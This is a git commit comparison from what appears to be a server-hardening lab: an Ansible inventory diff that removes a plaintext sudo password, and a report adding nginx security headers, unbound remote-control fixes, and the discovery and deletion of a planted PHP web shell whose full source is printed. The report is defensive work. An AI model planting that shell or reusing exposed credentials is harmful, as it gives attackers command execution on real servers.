Compare commits
2 Commits
512acb8db3
...
0c57c12ac8
Author | SHA1 | Date |
---|---|---|
Gašper Spagnolo | 0c57c12ac8 | |
Gašper Spagnolo | d51c0e8665 |
|
@ -5,7 +5,6 @@ all:
|
||||||
ansible_connection: ssh
|
ansible_connection: ssh
|
||||||
ansible_become: yes
|
ansible_become: yes
|
||||||
ansible_become_method: sudo
|
ansible_become_method: sudo
|
||||||
ansible_host: ml-node
|
ansible_host: 64.227.120.192
|
||||||
ansible_ssh_user: ml-node
|
ansible_ssh_user: root
|
||||||
ansible_ssh_private_key_file: "/home/spagnologasper/.ssh/keys/id_ed25519_ml-node"
|
ansible_ssh_private_key_file: "/home/spagnologasper/.ssh/keys/id_ed25519_ls2024_prep"
|
||||||
ansible_become_pass: dobercaj420
|
|
||||||
|
|
105
report/Report.md
105
report/Report.md
|
@ -274,6 +274,90 @@ server {
|
||||||
```
|
```
|
||||||
Serves files from `/var/www/html` and proxies requests to `/2048/` to `http://localhost:8018/` where we have a simple game.
|
Serves files from `/var/www/html` and proxies requests to `/2048/` to `http://localhost:8018/` where we have a simple game.
|
||||||
|
|
||||||
|
Lets enable xss protection in the nginx configuration.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
location /2048/ {
|
||||||
|
proxy_pass http://localhost:8018/;
|
||||||
|
proxy_set_header Host $host;
|
||||||
|
# Add security headers
|
||||||
|
add_header X-Frame-Options "SAMEORIGIN";
|
||||||
|
add_header X-Content-Type-Options "nosniff";
|
||||||
|
add_header X-XSS-Protection "1; mode=block";
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
And deny access to the all `.` files.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
location ~ /\. {
|
||||||
|
deny all;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
The process is run by the `conmon` process.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
root@ls-2024-9:~# sudo lsof -i :8018
|
||||||
|
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
|
||||||
|
conmon 1147 root 5u IPv4 19949 0t0 TCP *:8018 (LISTEN)
|
||||||
|
|
||||||
|
root 1147 0.0 0.2 82724 2112 ? Ssl 07:59 0:00 /usr/bin/conmon --api-version 1 -c 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -u 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -r /usr/bin/crun -b /var/lib/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata -p /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/pidfile -n 2048 --exit-dir /run/libpod/exits --full-attach -s -l journald --log-level warning --runtime-arg --log-format=json --runtime-arg --log --runtime-arg=/run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/oci-log --conmon-pidfile /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/conmon.pid --exit-command /usr/bin/podman --exit-command-arg --root --exit-command-arg /var/lib/containers/storage --exit-command-arg --runroot --exit-command-arg /run/containers/storage --exit-command-arg --log-level --exit-command-arg warning --exit-command-arg --cgroup-manager --exit-command-arg systemd --exit-command-arg --tmpdir --exit-command-arg /run/libpod --exit-command-arg --runtime --exit-command-arg crun --exit-command-arg --events-backend --exit-command-arg journald --exit-command-arg container --exit-command-arg cleanup --exit-command-arg --rm --exit-command-arg 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6
|
||||||
|
```
|
||||||
|
|
||||||
|
It is a podman container.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
root@ls-2024-9:~# podman ps
|
||||||
|
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
|
||||||
|
4d05d4a1a404 docker.io/nejec/2048:latest apache2-foregroun... 2 hours ago Up 2 hours ago 0.0.0.0:8018->22/tcp 2048
|
||||||
|
root@ls-2024-9:~#
|
||||||
|
```
|
||||||
|
|
||||||
|
When going into the container we can see the php reverse shell script.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
root@ls-2024-9:~# podman exec -it 4d05d4a1a404 bash
|
||||||
|
root@4d05d4a1a404:/var/www/html# ls
|
||||||
|
app.js assets index.html manifest.json service-worker.js shell.php style.css
|
||||||
|
root@4d05d4a1a404:/var/www/html# cat shell.php
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<meta charset="utf-8">
|
||||||
|
<meta name="viewport" content="width=device-width, initial-scale=1">
|
||||||
|
<title>CMD</title>
|
||||||
|
<style type="text/css">
|
||||||
|
body {
|
||||||
|
background: black;
|
||||||
|
font-family: courier,arial;
|
||||||
|
color: white;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<br/><br/><br/>
|
||||||
|
<center>
|
||||||
|
<form method="POST">
|
||||||
|
<input type="text" name="cmd" placeholder="cmd" size=100/>
|
||||||
|
<input type="submit" value="exec"/>
|
||||||
|
</form>
|
||||||
|
</center>
|
||||||
|
<br/><br/><br/>
|
||||||
|
<?php
|
||||||
|
if(isset($_POST['cmd'])){
|
||||||
|
echo nl2br(shell_exec($_POST['cmd'].' 2>&1'));
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
</body>
|
||||||
|
root@4d05d4a1a404:/var/www/html#
|
||||||
|
```
|
||||||
|
|
||||||
|
Lets remove the file now.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
podman exec -it 4d05d4a1a404 rm -rf /var/www/html/shell.php
|
||||||
|
```
|
||||||
|
|
||||||
### Already f-up something
|
### Already f-up something
|
||||||
|
|
||||||
|
@ -378,3 +462,24 @@ Host ls2024_prep
|
||||||
|
|
||||||
### DNS
|
### DNS
|
||||||
|
|
||||||
|
Problem here is that remote control is enabled and we can use it to get the root shell.
|
||||||
|
|
||||||
|
```txt
|
||||||
|
root@ls-2024-9:/etc/unbound/unbound.conf.d# cat /etc/unbound/unbound.conf.d/remote-control.conf
|
||||||
|
# default unbound control
|
||||||
|
remote-control:
|
||||||
|
control-enable: yes
|
||||||
|
control-interface: ::0
|
||||||
|
control-use-cert: no
|
||||||
|
```
|
||||||
|
|
||||||
|
Lets disable remote control completely. and restart the service.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
root@ls-2024-9:/etc/unbound/unbound.conf.d# systemctl restart unbound
|
||||||
|
```
|
||||||
|
|
||||||
|
This is all I found suspicious in the DNS configuration.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|